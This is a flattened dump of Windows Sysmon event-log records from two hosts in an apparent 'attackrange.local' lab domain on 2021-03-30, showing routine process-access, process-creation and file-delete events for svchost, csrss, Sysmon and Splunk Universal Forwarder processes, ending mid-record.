16:32:23.692{7F8C56E7-4E3C-6063-0C00-00000000AF01}832876C:\Windows\system32\svchost.exe{7F8C56E7-4E4C-6063-2D00-00000000AF01}2148C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001061568Microsoft-Windows-Sysmon/Operationalwin-dc-877.attackrange.local-2021-03-30 16:32:23.692{7F8C56E7-4E3C-6063-0C00-00000000AF01}832876C:\Windows\system32\svchost.exe{7F8C56E7-4E4C-6063-2D00-00000000AF01}2148C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001061567Microsoft-Windows-Sysmon/Operationalwin-dc-877.attackrange.local-2021-03-30 16:32:23.692{7F8C56E7-4E3C-6063-0C00-00000000AF01}832876C:\Windows\system32\svchost.exe{7F8C56E7-4E4C-6063-2D00-00000000AF01}2148C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001061566Microsoft-Windows-Sysmon/Operationalwin-dc-877.attackrange.local-2021-03-30 16:32:23.692{7F8C56E7-4E3A-6063-0500-00000000AF01}4121572C:\Windows\system32\csrss.exe{7F8C56E7-5297-6063-3601-00000000AF01}5284C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5182f 10341000x80000000000000001061565Microsoft-Windows-Sysmon/Operationalwin-dc-877.attackrange.local-2021-03-30 16:32:23.692{7F8C56E7-4E4C-6063-3300-00000000AF01}23643588C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{7F8C56E7-5297-6063-3601-00000000AF01}5284C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7354|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 154100x80000000000000001061564Microsoft-Windows-Sysmon/Operationalwin-dc-877.attackrange.local-2021-03-30 16:32:23.694{7F8C56E7-5297-6063-3601-00000000AF01}5284C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe8.0.2Active Directory monitorsplunk ApplicationSplunk Inc.splunk-admon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{7F8C56E7-4E3B-6063-E703-000000000000}0x3e70SystemMD5=947139F3BB2AB70CAF692A60C7A3A735,SHA256=940554A0170A70F634689CC84B00C51AC0BCF773C9639E1305E3672441FC85C8,IMPHASH=357CEC18833E7FF2ABFB722902B13165{7F8C56E7-4E4C-6063-3300-00000000AF01}2364C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 10341000x80000000000000001061563Microsoft-Windows-Sysmon/Operationalwin-dc-877.attackrange.local-2021-03-30 16:32:23.004{7F8C56E7-4E4D-6063-3B00-00000000AF01}28842140C:\Windows\system32\conhost.exe{7F8C56E7-5297-6063-3501-00000000AF01}6040C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001061562Microsoft-Windows-Sysmon/Operationalwin-dc-877.attackrange.local-2021-03-30 16:32:23.004{7F8C56E7-4E3C-6063-0C00-00000000AF01}832876C:\Windows\system32\svchost.exe{7F8C56E7-4E4C-6063-2D00-00000000AF01}2148C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001061561Microsoft-Windows-Sysmon/Operationalwin-dc-877.attackrange.local-2021-03-30 16:32:23.004{7F8C56E7-4E3C-6063-0C00-00000000AF01}832876C:\Windows\system32\svchost.exe{7F8C56E7-4E4C-6063-2D00-00000000AF01}2148C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001061560Microsoft-Windows-Sysmon/Operationalwin-dc-877.attackrange.local-2021-03-30 16:32:23.004{7F8C56E7-4E3C-6063-0C00-00000000AF01}832876C:\Windows\system32\svchost.exe{7F8C56E7-4E4C-6063-2D00-00000000AF01}2148C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001061559Microsoft-Windows-Sysmon/Operationalwin-dc-877.attackrange.local-2021-03-30 16:32:23.004{7F8C56E7-4E3C-6063-0C00-00000000AF01}832876C:\Windows\system32\svchost.exe{7F8C56E7-4E4C-6063-2D00-00000000AF01}2148C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 23542300x80000000000000001061558Microsoft-Windows-Sysmon/Operationalwin-dc-877.attackrange.local-2021-03-30 16:32:23.004{7F8C56E7-4E5D-6063-7F00-00000000AF01}3584NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=DE19CDAEEFA4D12E1257F86228ABB2BB,SHA256=F7BC6F4AC84A54FD76A99E588A983BBAAD02B73789A1021AA396EDF2F32CBFD2,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000001061557Microsoft-Windows-Sysmon/Operationalwin-dc-877.attackrange.local-2021-03-30 16:32:23.004{7F8C56E7-4E3A-6063-0500-00000000AF01}4121572C:\Windows\system32\csrss.exe{7F8C56E7-5297-6063-3501-00000000AF01}6040C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5182f 10341000x80000000000000001061556Microsoft-Windows-Sysmon/Operationalwin-dc-877.attackrange.local-2021-03-30 16:32:23.004{7F8C56E7-4E4C-6063-3300-00000000AF01}23643588C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{7F8C56E7-5297-6063-3501-00000000AF01}6040C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7354|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 154100x80000000000000001061555Microsoft-Windows-Sysmon/Operationalwin-dc-877.attackrange.local-2021-03-30 16:32:23.006{7F8C56E7-5297-6063-3501-00000000AF01}6040C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe10.0.10011.16384SplunkMonNoHandle Control ProgramWindows (R) Win 7 DDK driverWindows (R) Win 7 DDK providerSplunkMonNoHandle.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{7F8C56E7-4E3B-6063-E703-000000000000}0x3e70SystemMD5=BF28C74E12839E40CD89696C7CB01573,SHA256=6187325F302F232DE582FE28E0E0D2B292AB8122C3356C9CE295A482D7B93EA3,IMPHASH=27776F2813155A6CF34F6A075A0C2EC8{7F8C56E7-4E4C-6063-3300-00000000AF01}2364C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x8000000000000000246443Microsoft-Windows-Sysmon/Operationalwin-host-847.attackrange.local-2021-03-30 16:32:23.945{CB4067E1-30BC-6062-CF00-00000000AF01}3508NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=95D1A5DDC5DC993CA0DA19DDA2D4129D,SHA256=29A79E0F4AFC3C840778CB14F8BDE27E2E7BE52F37E751F7D6896594A081D347,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000246442Microsoft-Windows-Sysmon/Operationalwin-host-847.attackrange.local-2021-03-30 16:32:23.679{CB4067E1-5297-6063-CA22-00000000AF01}39803432C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe{CB4067E1-30AF-6062-9800-00000000AF01}2672C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+5691a5|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+568cd6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+56657|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+56ca7|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+8f3800|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x8000000000000000246441Microsoft-Windows-Sysmon/Operationalwin-host-847.attackrange.local-2021-03-30 16:32:23.570{CB4067E1-30AF-6062-9C00-00000000AF01}37363764C:\Windows\system32\conhost.exe{CB4067E1-5297-6063-CA22-00000000AF01}3980C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x8000000000000000246440Microsoft-Windows-Sysmon/Operationalwin-host-847.attackrange.local-2021-03-30 16:32:23.570{CB4067E1-304B-6062-0C00-00000000AF01}7123440C:\Windows\system32\svchost.exe{CB4067E1-304C-6062-1F00-00000000AF01}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x8000000000000000246439Microsoft-Windows-Sysmon/Operationalwin-host-847.attackrange.local-2021-03-30 16:32:23.570{CB4067E1-304B-6062-0C00-00000000AF01}7123440C:\Windows\system32\svchost.exe{CB4067E1-304C-6062-1F00-00000000AF01}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x8000000000000000246438Microsoft-Windows-Sysmon/Operationalwin-host-847.attackrange.local-2021-03-30 16:32:23.570{CB4067E1-304B-6062-0C00-00000000AF01}7123440C:\Windows\system32\svchost.exe{CB4067E1-304C-6062-1F00-00000000AF01}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x8000000000000000246437Microsoft-Windows-Sysmon/Operationalwin-host-847.attackrange.local-2021-03-30 16:32:23.570{CB4067E1-304B-6062-0C00-00000000AF01}7123440C:\Windows\system32\svchost.exe{CB4067E1-304C-6062-1F00-00000000AF01}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x8000000000000000246436Microsoft-Windows-Sysmon/Operationalwin-host-847.attackrange.local-2021-03-30 16:32:23.570{CB4067E1-304B-6062-0C00-00000000AF01}7123440C:\Windows\system32\svchost.exe{CB4067E1-304C-6062-1F00-00000000AF01}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x8000000000000000246435Microsoft-Windows-Sysmon/Operationalwin-host-847.attackrange.local-2021-03-30 16:32:23.570{CB4067E1-304B-6062-0C00-00000000AF01}7123440C:\Windows\system32\svchost.exe{CB4067E1-304C-6062-1F00-00000000AF01}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x8000000000000000246434Microsoft-Windows-Sysmon/Operationalwin-host-847.attackrange.local-2021-03-30 16:32:23.570{CB4067E1-304B-6062-0C00-00000000AF01}7123440C:\Windows\system32\svchost.exe{CB4067E1-304C-6062-1F00-00000000AF01}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x8000000000000000246433Microsoft-Windows-Sysmon/Operationalwin-host-847.attackrange.local-2021-03-30 16:32:23.570{CB4067E1-304B-6062-0C00-00000000AF01}7123440C:\Windows\system32\svchost.exe{CB4067E1-304C-6062-1F00-00000000AF01}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x8000000000000000246432Microsoft-Windows-Sysmon/Operationalwin-host-847.attackrange.local-2021-03-30 16:32:23.570{CB4067E1-304B-6062-0C00-00000000AF01}7123440C:\Windows\system32\svchost.exe{CB4067E1-304C-6062-1F00-00000000AF01}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x8000000000000000246431Microsoft-Windows-Sysmon/Operationalwin-host-847.attackrange.local-2021-03-30 16:32:23.570{CB4067E1-304A-6062-0500-00000000AF01}392508C:\Windows\system32\csrss.exe{CB4067E1-5297-6063-CA22-00000000AF01}3980C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5182f 10341000x8000000000000000246430Microsoft-Windows-Sysmon/Operationalwin-host-847.attackrange.local-2021-03-30 16:32:23.570{CB4067E1-30AF-6062-9800-00000000AF01}26721992C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{CB4067E1-5297-6063-CA22-00000000AF01}3980C:\Program 